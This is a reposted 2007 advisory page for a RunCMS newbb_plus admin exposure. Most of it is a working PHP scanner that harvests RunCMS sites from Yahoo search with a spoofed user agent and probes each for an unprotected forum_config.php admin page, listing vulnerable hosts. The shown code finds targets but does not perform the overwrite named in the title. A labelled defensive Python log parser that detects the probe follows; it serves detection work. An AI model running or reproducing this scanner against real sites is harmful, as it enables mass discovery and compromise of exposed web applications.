RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit
Source: trueend5 yahoo com  Author: trueend5  Published: 2007-11-26
<?php
########################## WwW.BugReport.ir ###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: RunCms`s Bug Yahoo! Crawler
# Vendor: http://www.runcms.org/
# Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
# Exploitation: Remote with browser
# Coded By: trueend5 (trueend5 yahoo com)
#######################################################################################
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact : admin@bugreport.ir
######################## Bug Description ###########################
?>

<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>RunCms`s Bug Yahoo! Crawler</title>
<style type="text/css" media="screen">
body {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000">
<form action="?" method="post">
Run the Exploit And Use the results of "Yahoo! Search Engine" starting From the page:
<input type="text" name="StartPage" value="1" size="3">
including
<input type="text" name="PerPage" value="100" size="3">
results per page.<BR><BR>
<input type="submit" name="Start" value="Start">
</form>
<?php

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);


function sendpacket($packet)
{
global $host, $html;
$port  = 80;

$ock=fsockopen(gethostbyname($host),$port);
    if ($ock)
{
fputs($ock,$packet);
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
fclose($ock);
// echo nl2br(htmlentities($html));
    }else echo '<BR>No response from '.htmlentities($host).'<BR>';
}

// Start
if(isset($_POST['Start'] ,$_POST['StartPage'] ,$_POST['PerPage']))
{
$StartPage = ((intval($_POST['StartPage'])) > 0) ? intval($_POST['StartPage']) : 1;
$PerPage   = ((intval($_POST['PerPage'])) <= 100) ? intval($_POST['PerPage']) : 100;
if (($StartPage*$PerPage) > 1000)
{
echo "Yahoo! Search doesn't show More than 1000 Results per query"."<BR>";
die();
}
echo 'Trying to obtain URLs Which are suspected to "newbb_plus disclaimer.php
File Overwrite" ...'.'<BR>';

$Yahoo     = "search.yahoo.com";
$S         = $StartPage;
$P         = $PerPage;

for ($S; $S*$P < 1000; $S++)
{
$host    = $Yahoo;
$B       = ($S == 1) ? '' : '&b='.((($S-1)*$P)+1);
$Query   = "/search?p=runcms+inurl%3A%22%2Fmodules%2Fnews%2F%22&n=$P&ei=utf-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=url&vd=all&vst=0&vf=all&vm=p&fl=0&xargs=0&pstart=1".$B;

$packet  = "GET ".$Query." HTTP/1.1\r\n";
$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if(stristr($html , '403 Forbidden') === false
&& stristr($html , '302 Moved') === false)
{
echo '<HR><BR><CENTER>Obtained URLs From Page:'.($S).'<CENTER><BR>';
$Pattern = '/href="http:\/\/?([^\/]+)?(\/[a-zA-Z]+)?(\/modules\/news\/)/i';
preg_match_all($Pattern, $html, $Matches);
$TotalLinks = count($Matches[1]);
echo "In Progress<BR>";
for ($I=0; $I < $TotalLinks; $I++)
{
echo ".";
if ($Matches[2][$I] == '')
{
$Path = "/modules/newbb_plus/admin/forum_config.php";
}else
$Path    = $Matches[2][$I]."/modules/newbb_plus/admin/forum_config.php";
$host    = $Matches[1][$I];
$packet  = "GET ".$Path." HTTP/1.1\r\n";
$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if(stristr($html , '_MD_A_CONFIGFORUM') !== false)
{
echo "<BR><A href='http://".$host.$Path."'>".$host.$Path."</A><BR>";
}
}
}else
{
echo '<BR>'.'Yahoo! finds out that this in an automated request
from a malware! So try again after awhile!';
die();
}
}
}
?>
</body>
</html>
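A defender-side counterpart, added here and not part of the original advisory or the RunCMS project: it parses combined-format web access logs (an assumption about how the target site logs) and flags the probe the scanner above sends, recognising it by the newbb_plus admin path it requests on every candidate host and by the fake Shareaza user agent, so an operator can see which clients probed and whether the admin page was actually served to them.

```python
import re
from collections import defaultdict

# Combined access-log format (assumption: the web server logs in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators from the scanner above: the admin page it probes and the fake UA it sends.
PROBE_PATH = "/modules/newbb_plus/admin/forum_config.php"
PROBE_UA = "Shareaza v1.x.x.xx"

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Return the reasons (possibly none) an entry looks like this scanner."""
    reasons = []
    if entry["path"].split("?", 1)[0].endswith(PROBE_PATH):
        reasons.append("newbb_plus admin probe")
    if entry["ua"] == PROBE_UA:
        reasons.append("scanner user agent")
    # A 200 means the page rendered for the client; confirm it required authentication.
    if reasons and entry["status"] == "200":
        reasons.append("admin page served (check auth)")
    return reasons

def scan_log(lines):
    """Group suspicious entries by client IP: {ip: [(path, status, reasons)]}."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # skip lines the regex cannot parse
        reasons = classify(entry)
        if reasons:
            hits[entry["ip"]].append((entry["path"], entry["status"], reasons))
    return dict(hits)

# Constructed sample log lines (not real traffic); RFC 5737 documentation IPs.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Nov/2007:10:00:01 +0000] "GET /modules/newbb_plus/admin/forum_config.php HTTP/1.1" 200 5120 "-" "Shareaza v1.x.x.xx"',
    '203.0.113.7 - - [26/Nov/2007:10:00:02 +0000] "GET /forum/modules/newbb_plus/admin/forum_config.php HTTP/1.1" 404 210 "-" "Shareaza v1.x.x.xx"',
    '198.51.100.4 - - [26/Nov/2007:10:01:00 +0000] "GET /modules/news/index.php HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [26/Nov/2007:10:02:00 +0000] "GET /modules/newbb_plus/admin/forum_config.php HTTP/1.1" 302 0 "http://example.test/admin" "Mozilla/5.0"',
]
```

Run `scan_log` over a real log to list probing clients; a hit carrying "admin page served" is the one to investigate first, since it means the config page answered with 200 rather than redirecting to a login.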

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved